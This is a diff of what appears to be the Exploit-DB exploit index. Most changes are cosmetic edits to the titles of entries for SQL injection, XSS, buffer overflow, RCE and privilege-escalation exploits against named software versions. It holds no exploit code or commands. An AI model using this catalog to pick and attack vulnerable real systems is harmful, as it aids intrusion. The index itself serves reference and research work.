38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0 -38665,platforms/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Path Traversal",2015-11-10,HaHwul,php,webapps,0 -38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 +38665,platforms/php/webapps/38665.txt,"YesWiki 0.2 - 'template' Directory Traversal",2015-11-10,HaHwul,php,webapps,0 +38666,platforms/multiple/remote/38666.txt,"Apache Struts 2.2.3 - Multiple Open redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0 38667,platforms/windows/remote/38667.py,"ReadyMedia - Remote Heap Buffer Overflow",2013-07-15,"Zachary Cutlip",windows,remote,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38669,platforms/multiple/remote/38669.txt,"MongoDB - 'conn' Mongo Object Remote Code Execution",2013-06-04,"SCRT Security",multiple,remote,0 @@ -34944,12 +34947,12 @@ id,file,description,date,author,platform,type,port 38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 38673,platforms/php/webapps/38673.txt,"Collabtive - Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 -38674,platforms/php/webapps/38674.txt,"Wordpress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting",2013-07-22,"IeDb ir",php,webapps,0 38675,platforms/php/webapps/38675.html,"Magnolia CMS - Multiple Cross-Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 -38676,platforms/php/webapps/38676.txt,"Wordpress Duplicator Plugin - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 +38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin - Cross-Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0 38677,platforms/php/webapps/38677.txt,"vBulletin 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0 -38678,platforms/php/webapps/38678.txt,"Wordpress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 -38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 +38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 +38679,platforms/php/webapps/38679.txt,"Alienvault Open Source SIEM (OSSIM) - Multiple Cross-Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0 38682,platforms/php/webapps/38682.txt,"Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting",2013-07-31,"High-Tech Bridge",php,webapps,0 @@ -34958,21 +34961,21 @@ id,file,description,date,author,platform,type,port 38824,platforms/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote,0 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - Cross-Site Request Forgery Command Injection",2015-11-13,hyp3rlinx,php,webapps,0 -38689,platforms/php/webapps/38689.txt,"SilverStripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 +38689,platforms/php/webapps/38689.txt,"Silverstripe - 'MemberLoginForm.php' Information Disclosure",2013-08-01,"Fara Rustein",php,webapps,0 38691,platforms/cgi/webapps/38691.txt,"Kwok Information Server - Multiple SQL Injections",2013-08-07,"Yogesh Phadtare",cgi,webapps,0 38692,platforms/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote,0 -38693,platforms/php/webapps/38693.txt,"Advanced GuestBook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 +38693,platforms/php/webapps/38693.txt,"Advanced Guestbook - 'addentry.php' Arbitrary File Upload",2013-08-08,"Ashiyane Digital Security Team",php,webapps,0 38694,platforms/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote,0 38695,platforms/php/webapps/38695.txt,"CakePHP - AssetDispatcher Class Local File Inclusion",2013-08-13,"Takeshi Terada",php,webapps,0 38696,platforms/asp/webapps/38696.txt,"DotNetNuke 6.1.x - Cross-Site Scripting",2013-08-13,"Sajjad Pourali",asp,webapps,0 38697,platforms/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Parameter Local File Inclusion",2013-08-15,ICheer_No0M,php,webapps,0 38698,platforms/php/webapps/38698.html,"CF Image Host 1.65 - Cross-Site Request Forgery",2015-11-16,hyp3rlinx,php,webapps,0 38699,platforms/php/webapps/38699.txt,"CF Image Host 1.65 - PHP Command Injection",2015-11-16,hyp3rlinx,php,webapps,0 -38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - .gen SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 -38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - .gfb SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 -38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - .tpc File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 -38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - .tpc File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 -38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - .lf5 SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 +38700,platforms/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 +38701,platforms/windows/dos/38701.txt,"TECO SG2 FBD Client 3.51 - '.gfb' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 +38702,platforms/windows/dos/38702.txt,"TECO TP3-PCLINK 2.1 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 +38703,platforms/windows/dos/38703.txt,"TECO AP-PCLINK 1.094 - '.tpc' File Handling Buffer Overflow",2015-11-16,LiquidWorm,windows,dos,0 +38704,platforms/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' SEH Overwrite Buffer Overflow",2015-11-16,LiquidWorm,windows,local,0 38705,platforms/windows/dos/38705.py,"Sam Spade 1.14 - Browse URL Buffer Overflow (PoC)",2015-11-16,"Nipun Jaswal",windows,dos,0 38706,platforms/multiple/webapps/38706.txt,"VLC Web Interface 2.2.1 - Metadata Title Cross-Site Scripting",2015-11-16,"Andrea Sindoni",multiple,webapps,0 38707,platforms/hardware/webapps/38707.txt,"D-Link Wireless Router DIR-816L - Cross-Site Request Forgery",2015-11-16,"Bhadresh Patel",hardware,webapps,0 @@ -34981,8 +34984,8 @@ id,file,description,date,author,platform,type,port 38710,platforms/windows/dos/38710.py,"foobar2000 1.3.9 - '.pls' / '.m3u' / '.m3u8' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 38711,platforms/windows/dos/38711.py,"foobar2000 1.3.9 - '.asx' Local Crash (PoC)",2015-11-16,"Antonio Z.",windows,dos,0 38712,platforms/php/webapps/38712.txt,"Bo-Blog 2.1.1 - Cross-Site Scripting / SQL Injection",2013-08-20,"Ashiyane Digital Security Team",php,webapps,0 -38713,platforms/windows/dos/38713.txt,"Windows Kernel - win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 -38714,platforms/windows/dos/38714.txt,"Windows Kernel - win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38713,platforms/windows/dos/38713.txt,"Microsoft Windows - Kernel win32k.sys Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 +38714,platforms/windows/dos/38714.txt,"Microsoft Windows - Kernel win32k.sys Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)",2015-11-16,"Google Security Research",windows,dos,0 38715,platforms/hardware/remote/38715.txt,"D-Link DIR-815 / DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900 38716,platforms/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 38717,platforms/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 @@ -35002,9 +35005,9 @@ id,file,description,date,author,platform,type,port 38731,platforms/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 38732,platforms/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 38733,platforms/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - post2file.php Arbitrary File Upload",2015-11-16,Metasploit,php,remote,9999 -38734,platforms/windows/dos/38734.txt,"Kaspersky Antivirus - Certificate Handling Path Traversal",2015-11-16,"Google Security Research",windows,dos,0 -38735,platforms/windows/dos/38735.txt,"Kaspersky Antivirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0 -38736,platforms/windows/dos/38736.txt,"Kaspersky Antivirus - ZIP File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 +38734,platforms/windows/dos/38734.txt,"Kaspersky AntiVirus - Certificate Handling Directory Traversal",2015-11-16,"Google Security Research",windows,dos,0 +38735,platforms/windows/dos/38735.txt,"Kaspersky AntiVirus - DEX File Format Memory Corruption",2015-11-16,"Google Security Research",windows,dos,0 +38736,platforms/windows/dos/38736.txt,"Kaspersky AntiVirus - '.ZIP' File Format Use-After-Free",2015-11-16,"Google Security Research",windows,dos,0 38737,platforms/php/webapps/38737.txt,"Twilight CMS - DeWeS Web Server Directory Traversal",2013-08-21,"High-Tech Bridge",php,webapps,0 38738,platforms/python/webapps/38738.txt,"Plone - 'in_portal.py' <= 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",python,webapps,0 38739,platforms/java/webapps/38739.txt,"SearchBlox - Multiple Information Disclosure Vulnerabilities",2013-08-23,"Ricky Roane Jr",java,webapps,0 @@ -35017,14 +35020,14 @@ id,file,description,date,author,platform,type,port 38747,platforms/windows/dos/38747.py,"Pwstore - Denial of Service",2013-04-16,"Josep Pi Rodriguez",windows,dos,0 38748,platforms/php/webapps/38748.txt,"dBlog CMS - 'm' Parameter SQL Injection",2013-09-03,ACC3SS,php,webapps,0 38749,platforms/asp/webapps/38749.txt,"Flo CMS - 'archivem' Parameter SQL Injection",2013-09-03,ACC3SS,asp,webapps,0 -38750,platforms/php/webapps/38750.txt,"Wordpress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 +38750,platforms/php/webapps/38750.txt,"WordPress Users Ultra Plugin 1.5.50 - Unrestricted File Upload",2015-11-18,"Panagiotis Vagenas",php,webapps,0 38751,platforms/windows/local/38751.txt,"IBM i Access 7.1 - Buffer Overflow Code Execution",2015-11-18,hyp3rlinx,windows,local,0 38752,platforms/windows/local/38752.c,"Watchguard Server Center - Privilege Escalation",2013-09-08,"Julien Ahrens",windows,local,0 -38753,platforms/php/webapps/38753.html,"Wordpress Event Easy Calendar Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 +38753,platforms/php/webapps/38753.html,"WordPress Event Easy Calendar Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2013-09-07,anonymous,php,webapps,0 38754,platforms/php/webapps/38754.txt,"eTransfer Lite - 'file name' Parameter HTML Injection",2013-09-10,"Benjamin Kunz Mejri",php,webapps,0 -38755,platforms/php/webapps/38755.txt,"Wordpress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 -38756,platforms/php/webapps/38756.txt,"Wordpress RokNewsPager Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 -38757,platforms/php/webapps/38757.txt,"Wordpress RokStories Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 +38755,platforms/php/webapps/38755.txt,"WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection",2013-09-13,"Ashiyane Digital Security Team",php,webapps,0 +38756,platforms/php/webapps/38756.txt,"WordPress RokNewsPager Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-18,MustLive,php,webapps,0 +38757,platforms/php/webapps/38757.txt,"WordPress RokStories Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-17,MustLive,php,webapps,0 38758,platforms/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38759,platforms/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",windows,dos,0 38760,platforms/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field SEH Overflow",2015-11-19,"Luis Martínez",windows,dos,0 @@ -35034,49 +35037,49 @@ id,file,description,date,author,platform,type,port 38764,platforms/hardware/remote/38764.rb,"F5 iControl - iCall::Script Root Command Execution",2015-11-19,Metasploit,hardware,remote,443 38765,platforms/php/webapps/38765.txt,"Horde Groupware 5.2.10 - Cross-Site Request Forgery",2015-11-19,"High-Tech Bridge SA",php,webapps,80 38766,platforms/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote,0 -38767,platforms/php/webapps/38767.txt,"Wordpress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 -38768,platforms/php/webapps/38768.txt,"Wordpress RokMicroNews Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 +38767,platforms/php/webapps/38767.txt,"WordPress RokIntroScroller Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 +38768,platforms/php/webapps/38768.txt,"WordPress RokMicroNews Plugin - 'thumb.php' Multiple Security Vulnerabilities",2013-09-19,MustLive,php,webapps,0 38769,platforms/php/webapps/38769.txt,"Monstra CMS - 'login' Parameter SQL Injection",2013-09-20,linc0ln.dll,php,webapps,0 38770,platforms/php/webapps/38770.txt,"MentalJS - Sandbox Security Bypass",2013-09-20,"Rafay Baloch",php,webapps,0 38771,platforms/windows/dos/38771.py,"ShareKM - Remote Denial of Service",2013-09-22,"Yuda Prawira",windows,dos,0 38773,platforms/hardware/webapps/38773.txt,"ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,0 -38781,platforms/php/webapps/38781.txt,"AlienVault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection",2013-10-02,"Yu-Chi Ding",php,webapps,0 +38781,platforms/php/webapps/38781.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection",2013-10-02,"Yu-Chi Ding",php,webapps,0 38803,platforms/php/webapps/38803.txt,"WP-Client 3.8.7 - Persistent Cross-Site Scripting",2015-11-24,"Pier-Luc Maltais",php,webapps,80 -38782,platforms/php/webapps/38782.php,"Wordpress SEO Watcher Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 +38782,platforms/php/webapps/38782.php,"WordPress SEO Watcher Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation",2015-11-20,Metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 38777,platforms/php/webapps/38777.txt,"Joomla! JVideoClip Component - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 -38780,platforms/php/webapps/38780.txt,"SilverStripe - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 -38783,platforms/php/webapps/38783.php,"Wordpress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 -38784,platforms/php/webapps/38784.txt,"AlienVault Open Source SIEM (OSSIM) - 'timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 +38780,platforms/php/webapps/38780.txt,"Silverstripe - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 +38783,platforms/php/webapps/38783.php,"WordPress Woopra Analytics Plugin - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-07,wantexz,php,webapps,0 +38784,platforms/php/webapps/38784.txt,"Alienvault Open Source SIEM (OSSIM) - 'Timestamp' Parameter Directory Traversal",2013-10-08,"Ding Yu-Chi",php,webapps,0 38785,platforms/php/webapps/38785.pl,"vBulletin 4.1.x - '/install/upgrade.php' Security Bypass",2013-10-13,"Joshua Rogers",php,webapps,0 38786,platforms/php/webapps/38786.txt,"Ziteman CMS - Login Page SQL Injection",2013-10-10,"Ashiyane Digital Security Team",php,webapps,0 38787,platforms/windows/dos/38787.txt,"Acrobat Reader DC 15.008.20082.15957 - PDF Parsing Memory Corruption",2015-11-23,"Francis Provencher",windows,dos,0 38788,platforms/windows/dos/38788.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (1)",2015-11-23,"Francis Provencher",windows,dos,0 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 -38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution Exploit",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 +38790,platforms/php/webapps/38790.pl,"vBulletin 5.x - Remote Code Execution",2015-11-23,"Mohammad Reza Espargham",php,webapps,80 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0 38792,platforms/windows/local/38792.txt,"Nvidia Stereoscopic 3D Driver Service 7.17.13.5382 - Arbitrary Run Key Creation",2015-11-23,"Google Security Research",windows,local,0 -38793,platforms/windows/dos/38793.txt,"Windows ndis.sys IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 -38794,platforms/windows/dos/38794.txt,"Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38795,platforms/windows/dos/38795.txt,"Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38796,platforms/windows/dos/38796.txt,"Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 +38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38796,platforms/windows/dos/38796.txt,"Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38797,platforms/php/remote/38797.rb,"Joomla Content History - SQL Injection / Remote Code Execution",2015-11-23,Metasploit,php,remote,80 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 -38799,platforms/php/webapps/38799.txt,"BilboPlanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 +38799,platforms/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 38800,platforms/php/webapps/38800.txt,"FreeSMS - pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 38801,platforms/php/webapps/38801.txt,"FreeSMS - pages/crc_handler.php Multiple Parameter Cross-Site Scripting",2013-09-27,"Sarahma Security",php,webapps,0 -38802,platforms/multiple/remote/38802.txt,"Oracle Glassfish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 +38802,platforms/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote,0 38804,platforms/hardware/remote/38804.py,"Multiple Level One Enterprise Access Point Devices - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote,0 38805,platforms/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote,0 38806,platforms/cgi/webapps/38806.txt,"Bugzilla - 'editflagtypes.cgi' Multiple Cross-Site Scripting Vulnerabilities",2013-10-09,"Mateusz Goik",cgi,webapps,0 38807,platforms/cgi/webapps/38807.txt,"Bugzilla 4.2 - Tabular Reports Unspecified Cross-Site Scripting",2013-10-09,"Mateusz Goik",cgi,webapps,0 -38808,platforms/php/webapps/38808.txt,"Wordpress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 +38808,platforms/php/webapps/38808.txt,"WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection",2013-10-08,Napsterakos,php,webapps,0 38809,platforms/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote,0 38810,platforms/hardware/remote/38810.py,"Multiple Vendors - 'RuntimeDiagnosticPing()' Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote,0 -38811,platforms/php/webapps/38811.txt,"Wordpress Daily Deal Theme - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 +38811,platforms/php/webapps/38811.txt,"WordPress Daily Deal Theme - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 38814,platforms/php/webapps/38814.php,"Joomla! Maian15 Component - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 @@ -35085,19 +35088,19 @@ id,file,description,date,author,platform,type,port 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 38818,platforms/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote,0 38819,platforms/php/webapps/38819.txt,"Course Registration Management System - Cross-Site Scripting / SQL Injection",2013-10-21,"Omar Kurt",php,webapps,0 -38820,platforms/php/webapps/38820.php,"Wordpress This Way Theme - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 +38820,platforms/php/webapps/38820.php,"WordPress This Way Theme - 'upload_settings_image.php' Arbitrary File Upload",2013-11-01,Bet0,php,webapps,0 38821,platforms/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote,0 38822,platforms/windows/webapps/38822.rb,"Sysaid Helpdesk Software 14.4.32 b25 - SQL Injection (Metasploit)",2015-11-28,hland,windows,webapps,8080 38831,platforms/php/webapps/38831.txt,"HumHub 0.11.2 / 0.20.0-beta.2 - SQL Injection",2015-11-30,"LSE Leading Security Experts GmbH",php,webapps,80 38825,platforms/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote,0 38826,platforms/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Function Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote,0 38827,platforms/php/remote/38827.txt,"Nagios XI - 'tfPassword' Parameter SQL Injection",2013-12-13,"Denis Andzakovic",php,remote,0 -38828,platforms/php/webapps/38828.php,"Limonade framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 +38828,platforms/php/webapps/38828.php,"Limonade Framework - 'limonade.php' Local File Disclosure",2013-11-17,"Yashar shahinzadeh",php,webapps,0 38829,platforms/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote SEH Buffer Overflow (DEP Bypass with ROP)",2015-11-30,Knaps,windows,remote,0 38830,platforms/php/webapps/38830.txt,"MyCustomers CMS 1.3.873 - SQL Injection",2015-11-30,"Persian Hack Team",php,webapps,80 36025,platforms/windows/remote/36025.py,"Achat 0.150 beta7 - Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote,0 38832,platforms/linux/local/38832.py,"RHEL 7.0/7.1 - abrt/sosreport Privilege Escalation",2015-12-01,rebel,linux,local,0 -38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Aaccess (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0 +38833,platforms/linux/webapps/38833.txt,"Kodi 15 - Arbitrary File Access (Web Interface)",2015-12-01,"Machiel Pronk",linux,webapps,0 38840,platforms/hardware/webapps/38840.txt,"Belkin N150 Wireless Home Router F9K1009 v1 - Multiple Vulnerabilities",2015-12-01,"Rahul Pratap Singh",hardware,webapps,80 38841,platforms/php/webapps/38841.txt,"ZenPhoto 1.4.10 - Local File Inclusion",2015-12-01,hyp3rlinx,php,webapps,80 38842,platforms/php/webapps/38842.txt,"Testa OTMS - Multiple SQL Injections",2013-11-13,"Ashiyane Digital Security Team",php,webapps,0 @@ -35105,35 +35108,35 @@ id,file,description,date,author,platform,type,port 38835,platforms/multiple/local/38835.py,"Centos 7.1/Fedora 22 - abrt Privilege Escalation",2015-12-01,rebel,multiple,local,0 38836,platforms/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",multiple,webapps,0 38837,platforms/php/webapps/38837.txt,"IP.Board 4.1.4.x - Persistent Cross-Site Scripting",2015-12-01,"Mehdi Alouache",php,webapps,0 -38844,platforms/php/webapps/38844.html,"Wordpress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 +38844,platforms/php/webapps/38844.html,"WordPress Blue Wrench Video Widget Plugin - Cross-Site Request Forgery",2013-11-23,"Haider Mahmood",php,webapps,0 38845,platforms/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote,0 -38846,platforms/multiple/remote/38846.txt,"nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 +38846,platforms/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote,0 38847,platforms/windows/local/38847.py,"Acunetix WVS 10 - Privilege Escalation",2015-12-02,"Daniele Linguaglossa",windows,local,0 -38848,platforms/php/webapps/38848.php,"Wordpress Suco Themes - 'themify-ajax.php' Arbitrary File Upload",2013-11-20,DevilScreaM,php,webapps,0 